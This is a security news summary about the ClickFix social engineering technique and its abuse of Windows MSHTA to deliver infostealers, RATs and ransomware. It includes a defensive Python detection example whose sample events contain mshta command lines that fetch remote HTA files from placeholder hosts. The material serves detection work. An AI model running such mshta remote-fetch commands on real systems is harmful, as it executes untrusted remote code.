
ClickFix Exploits MSHTA to Evade Security for Infostealers

Summary

– ClickFix is a social engineering technique that tricks users into executing malicious commands via fake pop-ups, enabling malware deployment and ransomware campaigns.
– ReliaQuest reports a 10% rise in drive-by compromises due to ClickFix, which also increased attacks using the legitimate Windows tool MSHTA to bypass security controls.
– MSHTA abuse, initially linked to ClearFake, now accounts for a third of defense evasion attacks, rising from 16th to second place in evasion tactics.
– ClickFix is used to deploy malware like Lumma Stealer and SectopRAT, often via fake Google ads, enabling credential theft and backdoor access for further exploitation.
– Ransomware actors are adopting ClickFix for its evasion capabilities, with 30% of RaaS affiliates expected to integrate it soon; restricting Windows Run prompt access is recommended for defense.

Security experts are raising alarms about ClickFix, a sophisticated social engineering tactic that’s increasingly being used to bypass security measures and deploy dangerous malware like infostealers and remote access Trojans (RATs). This technique manipulates users into executing harmful commands by convincing them to “fix” imaginary system issues, often through deceptive pop-ups that appear legitimate.

According to a recent Threat Spotlight report covering March to May 2025, ClickFix was responsible for a 10% surge in drive-by compromises compared to the previous period. The method has also fueled a spike in attacks exploiting MSHTA, a built-in Windows tool for running HTML applications. Since MSHTA is a trusted system binary, attackers leverage it to slip past security defenses that typically flag suspicious file-based delivery methods like phishing emails.

Earlier, the abuse of MSHTA was linked to ClearFake, a JavaScript framework that tricked users with fake CAPTCHAs into executing malicious commands. However, ClickFix’s adoption propelled MSHTA evasion tactics from 16th to the second most common technique, now accounting for a third of all defense evasion attacks.
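To show what the MSHTA abuse described above looks like from the detection side, here is an added Python example (written for this summary, not code from ReliaQuest or the source report) that scores Sysmon-style process-creation records: mshta.exe launched with a remote URL rather than a local .hta file, with explorer.exe as parent (consistent with the Run prompt), or mshta.exe spawning a script host such as PowerShell. The record layout, the rule names and the sample events are all constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation records for illustration; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://cdn.example.invalid/verify.hta"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command <payload placeholder>"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\LegacyApp\console.hta"'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": "mshta http://cdn.example.invalid/update.hta"},
]

URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule the event matches; an empty list means not flagged."""
    image, parent = basename(event["image"]), basename(event["parent"])
    cmdline = event["cmdline"]
    hits = []
    if image == "mshta.exe" and URL_RE.search(cmdline):
        # Legitimate HTAs run from local files; a remote URL is the hallmark of MSHTA abuse.
        hits.append("mshta_remote_content")
        if parent == "explorer.exe":
            # Explorer as parent is consistent with the Run prompt, i.e. a user-typed command.
            hits.append("user_launched")
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        # An HTA handing off to PowerShell or another script host is the second stage to watch.
        hits.append("mshta_spawns_script_host")
    return hits


def scan(events: list) -> list:
    """Return (index, matched_rules) for every event that matches at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := evaluate(e))]


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", ", ".join(hits))
```

The third sample (a locally installed .hta opened from Explorer) is deliberately left unflagged so the rules do not fire on every legitimate HTA application.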

Beyond MSHTA abuse, ClickFix has been weaponized to distribute malware like Lumma Stealer and SectopRAT, a .NET-based RAT. In one campaign, attackers combined ClickFix with malicious Google ads to push fake Chrome installers hiding malware. These tactics allowed cybercriminals to steal credentials and create backdoors for further exploitation, cementing SectopRAT as an emerging threat.

ReliaQuest warns that ClickFix could revolutionize initial access strategies for cybercriminals, particularly because it enables payload delivery through trusted tools like PowerShell. The technique’s effectiveness in evading email filters and endpoint protection has already caught the attention of ransomware groups.

Ransomware operators are expected to adopt ClickFix widely, with projections suggesting 30% of RaaS (Ransomware-as-a-Service) affiliates will integrate it soon to scale their operations. To mitigate risks, organizations are advised to restrict non-admin access to the Windows Run prompt, a common vector in ClickFix attacks.

The rise of ClickFix underscores the need for enhanced user education and stricter access controls to counter socially engineered threats that exploit human trust in familiar system tools.

(Source: InfoSecurity Magazine)
